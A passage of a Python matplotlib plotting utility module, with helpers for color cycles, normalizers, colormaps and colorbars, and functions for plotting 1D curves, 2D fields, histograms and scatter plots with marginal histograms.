        (ax.set_zlabel, zlabel),
    ):
        apply_label(text)
def get_default_colors():
    """Return the module's default sequence of plotting colors.

    Uses the colorblind-friendly cycle instead of
    ``plt.rcParams['axes.prop_cycle']``.
    """
    return CB_COLOR_CYCLE
class ColorCycle:
    """Cycles through a sequence of colors, or repeats a single fixed color.

    Parameters
    ----------
    colors : list or tuple of colors, a single color, or None
        A sequence is cycled through with wrap-around; any other value
        (e.g. a single color string) is returned unchanged on every call.
        None selects the module's default color cycle.
    """

    def __init__(self, colors=None):
        self._colors = get_default_colors() if colors is None else colors
        self._color_idx = 0

    def get_next(self):
        """Return the next color in the cycle, or the fixed single color."""
        # Generalized from a list-only check: tuples of colors now cycle
        # correctly instead of being returned whole as a single "color".
        if isinstance(self._colors, (list, tuple)):
            color = self._colors[self._color_idx % len(self._colors)]
            self._color_idx += 1
        else:
            color = self._colors
        return color
def get_linear_normalizer(vmin, vmax, clip=False):
    """Create a linear color normalizer over ``[vmin, vmax]``."""
    return mpl_colors.Normalize(vmin=vmin, vmax=vmax, clip=clip)
def get_log_normalizer(vmin, vmax, clip=False):
    """Create a logarithmic color normalizer over ``[vmin, vmax]``."""
    return mpl_colors.LogNorm(vmin=vmin, vmax=vmax, clip=clip)
def get_symlog_normalizer(vmin, vmax, linthresh, linscale=1.0, clip=False):
    """Create a base-10 symmetric-log normalizer with a linear region of
    half-width ``linthresh`` around zero."""
    return mpl_colors.SymLogNorm(
        linthresh,
        linscale=linscale,
        vmin=vmin,
        vmax=vmax,
        clip=clip,
        base=10,
    )
def get_normalizer(vmin, vmax, clip=False, log=False):
    """Create a linear or (if ``log``) logarithmic normalizer over ``[vmin, vmax]``."""
    if log:
        return get_log_normalizer(vmin, vmax, clip=clip)
    return get_linear_normalizer(vmin, vmax, clip=clip)
def get_cmap(name, bad_color="w"):
    """Look up a colormap by name, preferring the module's custom maps.

    Returns a copy (so the shared registry entries stay unmodified) with
    the given color assigned to bad (masked/NaN) values.
    """
    if name in CUSTOM_COLORMAPS:
        cmap = copy.copy(CUSTOM_COLORMAPS[name])
    else:
        cmap = copy.copy(plt.get_cmap(name))
    cmap.set_bad(bad_color)
    return cmap
def get_scalar_mappable(norm, cmap):
    """Wrap a normalizer and colormap in a ``ScalarMappable``."""
    return mpl_cm.ScalarMappable(cmap=cmap, norm=norm)
def set_color_cycle_from_cmap(ax, n_colors, cmap_name):
    """Set the axes property cycle to ``n_colors`` samples spread evenly
    over the named colormap."""
    mappable = get_scalar_mappable(get_normalizer(0, n_colors - 1), get_cmap(cmap_name))
    ax.set_prop_cycle(color=[mappable.to_rgba(idx) for idx in range(n_colors)])
def define_linear_segmented_colormap(name, colors, bad_color="white", N=256, gamma=1.0):
    """Build a linear segmented colormap from a color list and assign the
    given color to bad (masked/NaN) values."""
    cmap = mpl_colors.LinearSegmentedColormap.from_list(name, colors, N=N, gamma=gamma)
    cmap.set_bad(color=bad_color)
    return cmap
def colors_from_values(values, norm, cmap, alpha=1.0, relative_alpha=True):
    """Map values to RGBA colors via ``norm`` and ``cmap``.

    With ``relative_alpha`` the opacity scales with the normalized value,
    clipped to ``[0, alpha]``; otherwise every color gets opacity ``alpha``.
    """
    normalized = norm(values)
    rgba = cmap(normalized)
    if relative_alpha:
        rgba[:, -1] = np.clip(normalized * alpha, 0.0, alpha)
    else:
        rgba[:, -1] = alpha
    return rgba
def size_from_values(values, norm, max_size, min_size=1):
    """Compute marker sizes growing quadratically with the normalized values,
    clamped to ``[min_size, max_size]``."""
    scaled = max_size * norm(values) ** 2
    return np.clip(scaled, min_size, max_size)
def create_colorbar_axis(ax, loc="right", size="5%", pad=0.05):
    """Append a colorbar axis next to ``ax`` and return it.

    The axis divider is cached on the axes object because
    ``make_axes_locatable`` must not be called twice for the same axes.
    """
    divider = getattr(ax, "backstaff_axis_divider", None)
    if divider is None:
        divider = make_axes_locatable(ax)
        ax.backstaff_axis_divider = divider
    return divider.append_axes(loc, size=size, pad=pad)
def add_2d_colorbar(
    fig,
    ax,
    mappeable,
    loc="right",
    pad=0.05,
    minorticks_on=False,
    opposite_side_ticks=False,
    tick_formatter=None,
    label="",
):
    """Attach a colorbar for ``mappeable`` beside ``ax`` and return it."""
    vertical = loc in ("left", "right")
    cax = create_colorbar_axis(ax, loc=loc, pad=pad)
    cb = fig.colorbar(
        mappeable,
        cax=cax,
        label=label,
        orientation="vertical" if vertical else "horizontal",
        ticklocation=loc,
    )
    if minorticks_on:
        cb.ax.minorticks_on()
    tick_axis = cb.ax.yaxis if vertical else cb.ax.xaxis
    if opposite_side_ticks:
        # Move ticks and label to the side facing away from the plot.
        flipped = {"left": "right", "right": "left", "bottom": "top", "top": "bottom"}[loc]
        tick_axis.set_label_position(flipped)
        tick_axis.set_ticks_position(flipped)
    if tick_formatter is not None:
        tick_axis.set_major_formatter(tick_formatter)
    return cb
def add_2d_colorbar_inside_from_cmap_and_norm(
    fig,
    ax,
    norm,
    cmap,
    loc="upper left",
    tick_loc="bottom",
    width="30%",
    height="3%",
    orientation="horizontal",
    label="",
    fontsize="small",
    minorticks_on=False,
    tick_formatter=None,
):
    """Draw a small colorbar inset inside the axes and return it."""
    inset = inset_axes(ax, width=width, height=height, loc=loc)
    mappable = get_scalar_mappable(norm, cmap)
    mappable.set_array([])
    cb = fig.colorbar(
        mappable,
        cax=inset,
        orientation=orientation,
        ticklocation=tick_loc,
        label=label,
    )
    # Re-apply the label so the requested font size takes effect.
    cb.set_label(label=label, fontsize=fontsize)
    if minorticks_on:
        cb.ax.minorticks_on()
    cb.ax.tick_params(labelsize=fontsize)
    if tick_formatter is not None:
        tick_axis = cb.ax.yaxis if tick_loc in ("left", "right") else cb.ax.xaxis
        tick_axis.set_major_formatter(tick_formatter)
    return cb
def add_2d_colorbar_from_cmap_and_norm(
    fig,
    ax,
    norm,
    cmap,
    loc="right",
    width="5%",
    pad=0.05,
    minorticks_on=False,
    opposite_side_ticks=False,
    tick_formatter=None,
    label="",
    **kwargs,
):
    """Attach a colorbar built from a normalizer/colormap pair beside ``ax``.

    Extra keyword arguments are forwarded to ``fig.colorbar``.
    """
    vertical = loc in ("left", "right")
    mappable = get_scalar_mappable(norm, cmap)
    mappable.set_array([])
    cb = fig.colorbar(
        mappable,
        cax=create_colorbar_axis(ax, loc=loc, size=width, pad=pad),
        label=label,
        orientation="vertical" if vertical else "horizontal",
        ticklocation=loc,
        **kwargs,
    )
    if minorticks_on:
        cb.ax.minorticks_on()
    tick_axis = cb.ax.yaxis if vertical else cb.ax.xaxis
    if opposite_side_ticks:
        # Put ticks and label on the side facing away from the plot.
        flipped = {"left": "right", "right": "left", "bottom": "top", "top": "bottom"}[loc]
        tick_axis.set_label_position(flipped)
        tick_axis.set_ticks_position(flipped)
    if tick_formatter is not None:
        tick_axis.set_major_formatter(tick_formatter)
    return cb
def add_3d_colorbar(fig, norm, cmap, label=""):
    """Add a figure-level colorbar for the given normalizer and colormap."""
    mappable = get_scalar_mappable(norm, cmap)
    mappable.set_array([])
    return fig.colorbar(mappable, label=label)
def add_3d_line_collection(ax, x, y, z, colors, lw=1.0):
    """Add a polyline with per-segment colors to a 3D axes.

    Assumes x, y, z are 1D coordinate arrays of equal length — the
    points are paired into consecutive segments.
    """
    points = np.stack([x, y, z], axis=-1).reshape(-1, 1, 3)
    segments = np.concatenate([points[:-1], points[1:]], axis=1)
    collection = Line3DCollection(segments, colors=colors)
    collection.set_linewidth(lw)
    return ax.add_collection(collection)
def add_textbox(ax, text, loc, pad=0.4):
    """Add an anchored text box to the axes at the given location."""
    ax.add_artist(AnchoredText(text, loc, pad=pad))
def render(
    fig=None,
    tight_layout=True,
    bbox_extra_artists=None,
    bbox_inches="tight",
    output_path=None,
    force_show=False,
    close=True,
):
    """Finalize a figure: apply tight layout, then save it or display it.

    Without an output path the figure is shown. After saving, it is shown
    when ``force_show``, closed when ``close``, and otherwise left open.
    """
    if tight_layout and fig is not None:
        fig.tight_layout()
    if output_path is None:
        plt.show()
        return
    fig.savefig(
        output_path,
        bbox_extra_artists=bbox_extra_artists,
        bbox_inches=bbox_inches,
    )
    if force_show:
        plt.show()
    elif close:
        plt.close(fig)
def plot_1d_field(
    coords,
    values,
    fig=None,
    ax=None,
    color="k",
    alpha=1.0,
    lw=1.0,
    ls="-",
    marker=None,
    markersize=None,
    minorticks_on=True,
    x_lims=None,
    y_lims=None,
    log_x=False,
    log_y=False,
    extra_artists=None,
    extra_patches=None,
    xlabel=None,
    ylabel=None,
    label=None,
    legend_loc=None,
    legend_fontsize=None,
    title=None,
    zorder=2,
    output_path=None,
    render_now=True,
    fig_kwargs={},
):
    """Plot ``values`` against ``coords`` as a single curve.

    Creates a new figure/axes when either is missing. Returns the tuple
    ``(fig, ax, line)`` where ``line`` is the created line artist.
    """
    if fig is None or ax is None:
        fig, ax = create_2d_subplots(**fig_kwargs)

    (curve,) = ax.plot(
        coords,
        values,
        color=color,
        alpha=alpha,
        lw=lw,
        ls=ls,
        marker=marker,
        markersize=markersize,
        markeredgewidth=0,
        label=label,
        zorder=zorder,
    )

    for artist in extra_artists if extra_artists is not None else ():
        ax.add_artist(artist)
    for patch in extra_patches if extra_patches is not None else ():
        ax.add_patch(patch)

    if log_x:
        ax.set_xscale("log")
    if log_y:
        ax.set_yscale("log")

    set_2d_plot_extent(ax, x_lims, y_lims)
    set_2d_axis_labels(ax, xlabel, ylabel)
    if minorticks_on:
        ax.minorticks_on()
    if title is not None:
        ax.set_title(title)
    if legend_loc is not None:
        ax.legend(loc=legend_loc, fontsize=legend_fontsize)

    if render_now:
        render(fig, output_path=output_path)

    return fig, ax, curve
def plot_2d_field(
    hor_coords,
    vert_coords,
    values,
    alphas=None,
    fig=None,
    ax=None,
    minorticks_on=True,
    aspect_equal=True,
    log_x=False,
    log_y=False,
    vmin=None,
    vmax=None,
    log=False,
    symlog=False,
    linthresh=np.inf,
    linscale=1.0,
    x_lims=None,
    y_lims=None,
    cmap_name="viridis",
    cmap_bad_color="white",
    cbar_loc="right",
    cbar_pad=0.05,
    cbar_minorticks_on=False,
    cbar_opposite_side_ticks=False,
    contour_levels=None,
    contour_colors="r",
    contour_alpha=1.0,
    log_contour=False,
    vmin_contour=None,
    vmax_contour=None,
    contour_cmap_name="viridis",
    extra_artists=None,
    xlabel=None,
    ylabel=None,
    clabel="",
    title=None,
    rasterized=None,
    output_path=None,
    picker=None,
    render_now=True,
    fig_kwargs=dict(width=None, aspect_ratio=None),
):
    """Plot a 2D scalar field as a pseudocolor mesh with optional contours.

    The field ``values`` has shape ``(hor_coords.size, vert_coords.size)``
    (it is transposed before plotting). Returns ``(fig, ax, mesh)``.

    Fixes over the previous version:
    - ``fig_kwargs`` is copied before popping keys, so the caller's dict
      (and the shared mutable default) is no longer emptied on first use.
    - The computed/popped ``width`` and ``dpi`` are now actually forwarded
      to ``create_2d_subplots`` instead of being silently discarded.
    - ``contourf`` is given either ``colors`` or ``cmap`` (never both),
      which matplotlib otherwise rejects with a ValueError.
    """
    if fig is None or ax is None:
        # Copy so popping does not mutate the caller's dict or the default.
        fig_kwargs = dict(fig_kwargs)
        width = fig_kwargs.pop("width", None)
        aspect_ratio = fig_kwargs.pop("aspect_ratio", None)
        dpi = fig_kwargs.pop("dpi", 300)
        if width is None:
            # Default to roughly 3 figure pixels per grid cell.
            width = 3.0 * hor_coords.size / dpi
        if aspect_ratio is None:
            aspect_ratio = (
                ((hor_coords[-1] - hor_coords[0]) / (vert_coords[-1] - vert_coords[0]))
                if aspect_equal
                else (4 / 3)
            )
        fig, ax = create_2d_subplots(
            width=width, aspect_ratio=aspect_ratio, dpi=dpi, **fig_kwargs
        )

    if symlog:
        norm = get_symlog_normalizer(vmin, vmax, linthresh, linscale=linscale)
    else:
        norm = get_normalizer(vmin, vmax, log=log)

    if log_x:
        hor_coords = np.log10(hor_coords)
    if log_y:
        vert_coords = np.log10(vert_coords)

    # Treat the given coordinates as lower cell edges and extrapolate one
    # extra edge so that pcolormesh gets n+1 edges for n values.
    lower_edges_hor = np.empty(hor_coords.size + 1, dtype=hor_coords.dtype)
    lower_edges_vert = np.empty(vert_coords.size + 1, dtype=vert_coords.dtype)
    lower_edges_hor[:-1] = hor_coords
    lower_edges_vert[:-1] = vert_coords
    lower_edges_hor[-1] = hor_coords[-1] + (hor_coords[-1] - hor_coords[-2])
    lower_edges_vert[-1] = vert_coords[-1] + (vert_coords[-1] - vert_coords[-2])

    mesh = ax.pcolormesh(
        *np.meshgrid(lower_edges_hor, lower_edges_vert),
        values.T,
        shading="auto",
        norm=norm,
        cmap=get_cmap(cmap_name, bad_color=cmap_bad_color),
        rasterized=rasterized,
        picker=picker,
    )

    if contour_levels is not None:
        # contourf forbids specifying both `colors` and `cmap`; prefer the
        # explicit colors and fall back to the colormap when colors is None.
        color_kwargs = (
            dict(colors=contour_colors)
            if contour_colors is not None
            else dict(cmap=get_cmap(contour_cmap_name))
        )
        ax.contourf(
            hor_coords,
            vert_coords,
            values.T,
            levels=contour_levels,
            norm=get_normalizer(vmin_contour, vmax_contour, log=log_contour),
            alpha=contour_alpha,
            rasterized=rasterized,
            **color_kwargs,
        )

    if extra_artists is not None:
        for artist in extra_artists:
            ax.add_artist(artist)

    if x_lims is None:
        x_lims = hor_coords[0], hor_coords[-1]
    if y_lims is None:
        y_lims = vert_coords[0], vert_coords[-1]
    set_2d_plot_extent(ax, x_lims, y_lims)
    set_2d_axis_labels(ax, xlabel, ylabel)
    if cbar_loc is not None:
        add_2d_colorbar(
            fig,
            ax,
            mesh,
            loc=cbar_loc,
            pad=cbar_pad,
            minorticks_on=cbar_minorticks_on,
            opposite_side_ticks=cbar_opposite_side_ticks,
            label=clabel,
        )

    if minorticks_on:
        ax.minorticks_on()
    if aspect_equal:
        ax.set_aspect("equal")
    if title is not None:
        ax.set_title(title)

    if alphas is not None:
        # Facecolors only exist after a draw; overwrite their alpha channel.
        fig.canvas.draw()
        mesh.get_facecolors()[:, 3] = alphas.T.ravel()

    if render_now:
        render(fig, output_path=output_path)

    return fig, ax, mesh
def plot_histogram(
    values,
    weights=None,
    fig=None,
    ax=None,
    bin_weighted=False,
    divided_by_bin_size=False,
    min_n_values=None,
    hist_scale=1.0,
    bins="auto",
    weighted_average=False,
    log_x=False,
    log_y=False,
    show_log_x=False,
    linthresh_x=None,
    linthresh_y=None,
    vmin=None,
    vmax=None,
    plot_type="steps",
    horizontal=False,
    fit_limits=None,
    extra_artists=None,
    color="k",
    lw=1.0,
    ls="-",
    alpha=1.0,
    fill_alpha=1.0,
    x_lims=None,
    y_lims=None,
    label=None,
    legend_loc=None,
    legend_fontsize=None,
    xlabel=None,
    ylabel=None,
    xlabel_color="k",
    ylabel_color="k",
    minorticks_on=True,
    output_path=None,
    fig_kwargs={},
    render_now=True,
):
    """Compute and plot a histogram of `values`.

    Binning is delegated to `compute_histogram` (defined elsewhere in this
    module — presumably returning (counts, bin_edges, bin_centers); verify
    against its definition). The counts can optionally be divided by the
    bin sizes, weighted by bin center times bin size, and/or scaled by
    `hist_scale`. `plot_type` selects the drawing style: "steps", "bar",
    "fillstep" (filled area plus step outline), "fill" (filled area plus
    smooth line) or "points". With `horizontal` the bins run along the
    y-axis. If `fit_limits` is given, a straight line (in the chosen
    lin/log space) is fitted to the histogram between those bin-center
    values and drawn with its slope annotated.

    Returns (fig, ax, line), where `line` is the artist (or list of
    artists for the fill styles) created for the histogram.
    """
    if fig is None or ax is None:
        fig, ax = create_2d_subplots(**fig_kwargs)

    # When plotting horizontally, the value axis is y, so the log/linthresh
    # settings for binning come from the y-axis options instead of x.
    hist, bin_edges, bin_centers = compute_histogram(
        values,
        weights=weights,
        bins=bins,
        weighted_average=weighted_average,
        min_n_values=min_n_values,
        vmin=vmin,
        vmax=vmax,
        decide_bins_in_log_space=(log_y if horizontal else log_x),
        linthresh=(linthresh_y if horizontal else linthresh_x),
    )
    # Cast to float so the in-place scaling operations below are valid.
    hist = np.asfarray(hist)

    bin_sizes = bin_edges[1:] - bin_edges[:-1]
    if divided_by_bin_size:
        hist /= bin_sizes
    if bin_weighted:
        hist *= bin_centers * bin_sizes
    if hist_scale != 1.0:
        hist *= hist_scale

    # Draw the histogram in the requested style. For the "fill*" styles,
    # `line` collects both the filled area and the outline artists.
    if plot_type == "steps":
        if horizontal:
            (line,) = ax.step(hist, bin_edges[:-1], c=color, ls=ls, lw=lw, label=label)
        else:
            (line,) = ax.step(bin_edges[:-1], hist, c=color, ls=ls, lw=lw, label=label)
    elif plot_type == "bar":
        if horizontal:
            line = ax.barh(
                bin_edges[:-1],
                hist,
                align="edge",
                height=bin_sizes,
                log=log_x,
                color=color,
                alpha=alpha,
                linewidth=lw,
                label=label,
            )
        else:
            line = ax.bar(
                bin_edges[:-1],
                hist,
                align="edge",
                width=bin_sizes,
                log=log_y,
                color=color,
                alpha=alpha,
                linewidth=lw,
                label=label,
            )
    elif plot_type == "fillstep":
        line = []
        if horizontal:
            line.append(
                ax.fill_betweenx(
                    bin_edges[:-1], hist, step="pre", color=color, alpha=fill_alpha
                )
            )
        else:
            line.append(
                ax.fill_between(
                    bin_edges[:-1], hist, step="pre", color=color, alpha=fill_alpha
                )
            )
        if horizontal:
            line.append(
                ax.step(hist, bin_edges[:-1], c=color, ls=ls, lw=lw, label=label)
            )
        else:
            line.append(
                ax.step(bin_edges[:-1], hist, c=color, ls=ls, lw=lw, label=label)
            )
    elif plot_type == "fill":
        line = []
        if horizontal:
            line.append(
                ax.fill_betweenx(bin_centers, hist, color=color, alpha=fill_alpha)
            )
        else:
            line.append(
                ax.fill_between(bin_centers, hist, color=color, alpha=fill_alpha)
            )
        if horizontal:
            line.append(
                ax.plot(
                    hist, bin_centers, c=color, ls=ls, lw=lw, alpha=alpha, label=label
                )
            )
        else:
            line.append(
                ax.plot(
                    bin_centers, hist, c=color, ls=ls, lw=lw, alpha=alpha, label=label
                )
            )
    elif plot_type == "points":
        if horizontal:
            (line,) = ax.plot(
                hist, bin_centers, c=color, ls=ls, lw=lw, alpha=alpha, marker="o"
            )
        else:
            (line,) = ax.plot(
                bin_centers, hist, c=color, ls=ls, lw=lw, alpha=alpha, marker="o"
            )
    else:
        raise ValueError(f"Invalid plot type {plot_type}")

    if extra_artists is not None:
        for artist in extra_artists:
            ax.add_artist(artist)

    # Axis scales: a linthresh switches from pure log to symlog.
    if log_x or show_log_x:
        if linthresh_x is None:
            ax.set_xscale("log")
        else:
            ax.set_xscale("symlog", linthresh=linthresh_x)
    if log_y:
        if linthresh_y is None:
            ax.set_yscale("log")
        else:
            ax.set_yscale("symlog", linthresh=linthresh_y)

    if fit_limits is not None:
        # Fit a degree-1 polynomial to the histogram between the two
        # bin-center values closest to the given limits, working in log
        # space for any axis that is logarithmic.
        start_idx = np.argmin(np.abs(bin_centers - fit_limits[0]))
        end_idx = np.argmin(np.abs(bin_centers - fit_limits[1]))
        coefs = np.polyfit(
            np.log10(bin_centers[start_idx:end_idx])
            if log_x
            else bin_centers[start_idx:end_idx],
            np.log10(hist[start_idx:end_idx]) if log_y else hist[start_idx:end_idx],
            1,
        )
        print(f"Slope of fitted line: {coefs[0]}")
        fit_values = np.poly1d(coefs)(np.log10(bin_centers) if log_x else bin_centers)
        if log_y:
            fit_values = 10**fit_values
        ax.plot(bin_centers, fit_values, "k--", alpha=0.3, lw=1.0)

        # Annotate the slope along the fitted line, rotated to match its
        # on-screen angle (computed in display coordinates).
        shift = 3
        xylabel = (
            (bin_centers[shift] + bin_centers[shift + 1]) / 2,
            (fit_values[shift] + fit_values[shift + 1]) / 2,
        )
        p1 = ax.transData.transform_point((bin_centers[shift], fit_values[shift]))
        p2 = ax.transData.transform_point(
            (bin_centers[shift + 1], fit_values[shift + 1])
        )
        dy = p2[1] - p1[1]
        dx = p2[0] - p1[0]
        rotn = np.degrees(np.arctan2(dy, dx))
        ax.annotate(
            f"{coefs[0]:.1f}",
            xy=xylabel,
            ha="center",
            va="center",
            rotation=rotn,
            backgroundcolor="w",
            alpha=0.5,
            fontsize="x-small",
        )

    if minorticks_on:
        ax.minorticks_on()

    set_2d_plot_extent(ax, x_lims, y_lims)
    set_2d_axis_labels(ax, xlabel, ylabel, xcolor=xlabel_color, ycolor=ylabel_color)
    ax.tick_params(axis="x", labelcolor=xlabel_color)
    ax.tick_params(axis="y", labelcolor=ylabel_color)

    if legend_loc:
        ax.legend(loc=legend_loc, fontsize=legend_fontsize)

    if render_now:
        render(fig, output_path=output_path)

    return fig, ax, line
def plot_scatter(
    values_x,
    values_y,
    values_c=None,
    fig=None,
    ax=None,
    log_x=False,
    log_y=False,
    linthresh_x=None,
    linthresh_y=None,
    linthresh_c=None,
    log_c=False,
    vmin_c=None,
    vmax_c=None,
    cmap_name="viridis",
    marker="o",
    s=5.0,
    relative_s=False,
    color="k",
    edgecolors="none",
    alpha=1.0,
    relative_alpha=False,
    x_lims=None,
    y_lims=None,
    xlabel=None,
    ylabel=None,
    aspect="auto",
    minorticks_on=True,
    internal_cbar=False,
    cbar_loc="right",
    cbar_pad=0.05,
    cbar_minorticks_on=False,
    cbar_opposite_side_ticks=False,
    cbar_tick_loc="right",
    cbar_width="5%",
    cbar_height="60%",
    cbar_orientation="vertical",
    clabel="",
    label=None,
    legend_loc=None,
    extra_artists=None,
    show_break_lines=False,
    output_path=None,
    fig_kwargs={},
    render_now=True,
):
    """Create a 2D scatter plot, optionally colored by the values in ``values_c``.

    Passing ``x_lims`` as a pair of (min, max) pairs produces a "broken"
    x-axis: two side-by-side panels sharing the y-axis, one per x sub-range.

    Returns ``(fig, axes[0])`` for a single panel and ``(fig, axes)`` when
    the x-axis is broken, where ``axes`` is the sequence ``[extra_ax, ax]``
    (left and right panel).
    """
    # A broken x-axis is requested by giving x_lims as two (min, max) pairs.
    broken_x = (
        isinstance(x_lims, (tuple, list))
        and isinstance(x_lims[0], (tuple, list))
        and isinstance(x_lims[1], (tuple, list))
    )
    if fig is None or ax is None:
        if broken_x:
            fig, axes = create_2d_subplots(ncols=2, sharey=True, **fig_kwargs)
            extra_ax, ax = axes
            fig.subplots_adjust(wspace=0)
            # Double the percentage width so the colorbar reads the same
            # relative to a half-width panel.
            cbar_width = f'{2*float(cbar_width.replace("%", ""))}%'
        else:
            fig, ax = create_2d_subplots(**fig_kwargs)
            axes = [ax]
    else:
        # A provided sequence of axes implies a pre-made broken x-axis.
        if isinstance(ax, (list, tuple, np.ndarray)):
            axes = ax
            extra_ax, ax = axes
            broken_x = True
        else:
            axes = [ax]
    # NOTE(review): the loops below rebind the name ``ax``; because the main
    # axes is the last element of ``axes`` it ends up unchanged, but this is
    # fragile if the ordering of ``axes`` is ever altered.
    if log_x:
        if linthresh_x is None:
            for ax in axes:
                ax.set_xscale("log")
        else:
            for ax in axes:
                ax.set_xscale("symlog", linthresh=linthresh_x)
    if log_y:
        if linthresh_y is None:
            for ax in axes:
                ax.set_yscale("log")
        else:
            for ax in axes:
                ax.set_yscale("symlog", linthresh=linthresh_y)
    if values_c is None:
        c = color
    else:
        # Map values_c through a linear/log/symlog normalizer to colors
        # (and optionally marker sizes).
        if vmin_c is None:
            vmin_c = np.nanmin(values_c)
        if vmax_c is None:
            vmax_c = np.nanmax(values_c)
        if linthresh_c is None:
            norm = get_normalizer(vmin_c, vmax_c, log=log_c)
        else:
            norm = get_symlog_normalizer(vmin_c, vmax_c, linthresh_c)
        cmap = get_cmap(cmap_name)
        c = colors_from_values(
            values_c, norm, cmap, alpha=alpha, relative_alpha=relative_alpha
        )
        if relative_s:
            s = size_from_values(values_c, norm, s)
        if cbar_loc is not None:
            if internal_cbar:
                add_2d_colorbar_inside_from_cmap_and_norm(
                    fig,
                    ax,
                    norm,
                    cmap,
                    loc=cbar_loc,
                    tick_loc=cbar_tick_loc,
                    width=cbar_width,
                    height=cbar_height,
                    orientation=cbar_orientation,
                    label=clabel,
                )
            else:
                add_2d_colorbar_from_cmap_and_norm(
                    fig,
                    ax,
                    norm,
                    cmap,
                    loc=cbar_loc,
                    width=cbar_width,
                    pad=cbar_pad,
                    minorticks_on=cbar_minorticks_on,
                    opposite_side_ticks=cbar_opposite_side_ticks,
                    label=clabel,
                )
            if broken_x:
                # Add an invisible (unfilled, axis turned off) colorbar to
                # the extra panel so both panels keep the same drawable width.
                cb = add_2d_colorbar_from_cmap_and_norm(
                    fig,
                    extra_ax,
                    norm,
                    cmap,
                    loc=cbar_loc,
                    width=cbar_width,
                    pad=cbar_pad,
                    minorticks_on=cbar_minorticks_on,
                    opposite_side_ticks=cbar_opposite_side_ticks,
                    label=clabel,
                    filled=False,
                )
                cb.ax.axis("off")
    # Draw the scatter itself (duplicated on the extra panel when broken).
    ax.scatter(
        values_x,
        values_y,
        c=c,
        s=s,
        marker=marker,
        edgecolors=edgecolors,
        alpha=alpha,
        label=label,
    )
    if broken_x:
        extra_ax.scatter(
            values_x,
            values_y,
            c=c,
            s=s,
            marker=marker,
            edgecolors=edgecolors,
            alpha=alpha,
            label=label,
        )
        # Hide the facing spines and ticks where the two panels meet.
        extra_ax.spines.right.set_visible(False)
        ax.spines.left.set_visible(False)
        ax.tick_params(which="both", left=False, labelleft=False)
        extra_ax.tick_params(which="both", right=False, labelright=False)
        if show_break_lines:
            # Slanted marker pairs indicating the axis break.
            d = 0.5  # Proportion of vertical to horizontal extent of the slanted line
            kwargs = dict(
                marker=[(-d, -1), (d, 1)],
                markersize=8,
                linestyle="none",
                color="k",
                mec="k",
                mew=1,
                clip_on=False,
            )
            extra_ax.plot([1, 1], [0, 1], transform=extra_ax.transAxes, **kwargs)
            ax.plot([0, 0], [0, 1], transform=ax.transAxes, **kwargs)
    if extra_artists is not None:
        for artist in extra_artists:
            ax.add_artist(artist)
    if minorticks_on:
        for ax in axes:
            ax.minorticks_on()
    for ax in axes:
        ax.set_aspect(aspect)
    if x_lims is not None:
        if broken_x:
            extra_ax.set_xlim(*x_lims[0])
            ax.set_xlim(*x_lims[1])
        else:
            ax.set_xlim(*x_lims)
    if y_lims is not None:
        ax.set_ylim(*y_lims)
    if broken_x:
        # Shared x-label spanning both panels; y-label on the left panel only.
        fig.supxlabel(xlabel, y=0.04, fontsize="medium")
        extra_ax.set_ylabel(ylabel)
    else:
        set_2d_axis_labels(ax, xlabel, ylabel)
    if legend_loc is not None:
        ax.legend(loc=legend_loc)
    if render_now:
        render(fig, output_path=output_path, tight_layout=False)
    return fig, (axes[0] if len(axes) == 1 else axes)
def plot_scatter_with_histograms(
    values_x,
    values_y,
    values_c=None,
    hist_x_scale=1.0,
    hist_y_scale=1.0,
    bins_x="auto",
    bins_y="auto",
    hist_x_divided_by_bin_size=False,
    hist_y_divided_by_bin_size=False,
    log_x=False,
    log_y=False,
    log_c=False,
    log_hist_x=False,
    log_hist_y=False,
    vmin_x=None,
    vmax_x=None,
    vmin_y=None,
    vmax_y=None,
    vmin_c=None,
    vmax_c=None,
    cmap_name="viridis",
    marker="o",
    s=5.0,
    relative_s=False,
    color="k",
    edgecolors="none",
    alpha=1.0,
    relative_alpha=False,
    hist_x_alpha=1.0,
    hist_y_alpha=1.0,
    hist_x_color="k",
    hist_y_color="k",
    hist_linewidth=0,
    xlabel=None,
    ylabel=None,
    hist_x_plot_type="bar",
    hist_y_plot_type="bar",
    hist_x_label=None,
    hist_y_label=None,
    hist_x_label_color="k",
    hist_y_label_color="k",
    hist_x_fit_limits=None,
    hist_y_fit_limits=None,
    spacing=0.015,
    hist_size_x=0.3,
    hist_size_y=0.3,
    left_padding=0.12,
    bottom_padding=0.1,
    minorticks_on=True,
    internal_cbar=False,
    cbar_loc="upper left",
    cbar_tick_loc="right",
    cbar_width="3%",
    cbar_height="60%",
    cbar_orientation="vertical",
    clabel="",
    output_path=None,
    fig_kwargs={},
    render_now=True,
):
    """Scatter plot with marginal histograms along the top and right edges.

    The main scatter axes shares its x-axis with the top histogram panel and
    its y-axis with the right histogram panel (drawn horizontally).

    Returns ``(fig, ax, ax_hist_x, ax_hist_y)``.
    """
    left = left_padding  # > 0 to make space for labels
    bottom = bottom_padding  # > 0 to make space for labels
    # Remaining figure fraction after padding, spacing and histogram panels.
    width = 1 - 1.5 * left - spacing - hist_size_y
    height = 1 - 1.5 * bottom - spacing - hist_size_x
    fig = create_figure(**fig_kwargs)
    ax = fig.add_axes([left, bottom, width, height])
    ax_hist_x = fig.add_axes(
        [left, bottom + height + spacing, width, hist_size_x], sharex=ax
    )
    ax_hist_y = fig.add_axes(
        [left + width + spacing, bottom, hist_size_y, height], sharey=ax
    )
    # Hide redundant tick labels on the shared axes and color the histogram
    # count labels to match their panel.
    ax_hist_x.tick_params(axis="x", labelbottom=False)
    ax_hist_y.tick_params(axis="y", labelleft=False)
    ax_hist_x.tick_params(axis="y", labelcolor=hist_x_label_color)
    ax_hist_y.tick_params(axis="x", labelcolor=hist_y_label_color)
    if log_x:
        ax.set_xscale("log")
    if log_y:
        ax.set_yscale("log")
    if values_c is None:
        c = color
    else:
        # Map values_c to colors (and optionally marker sizes).
        if vmin_c is None:
            vmin_c = np.nanmin(values_c)
        if vmax_c is None:
            vmax_c = np.nanmax(values_c)
        norm = get_normalizer(vmin_c, vmax_c, log=log_c)
        cmap = get_cmap(cmap_name)
        c = colors_from_values(
            values_c, norm, cmap, alpha=alpha, relative_alpha=relative_alpha
        )
        if relative_s:
            s = size_from_values(values_c, norm, s)
        if internal_cbar:
            add_2d_colorbar_inside_from_cmap_and_norm(
                fig,
                ax,
                norm,
                cmap,
                loc=cbar_loc,
                tick_loc=cbar_tick_loc,
                width=cbar_width,
                height=cbar_height,
                orientation=cbar_orientation,
                label=clabel,
            )
    ax.scatter(
        values_x, values_y, c=c, s=s, marker=marker, edgecolors=edgecolors, alpha=alpha
    )
    if minorticks_on:
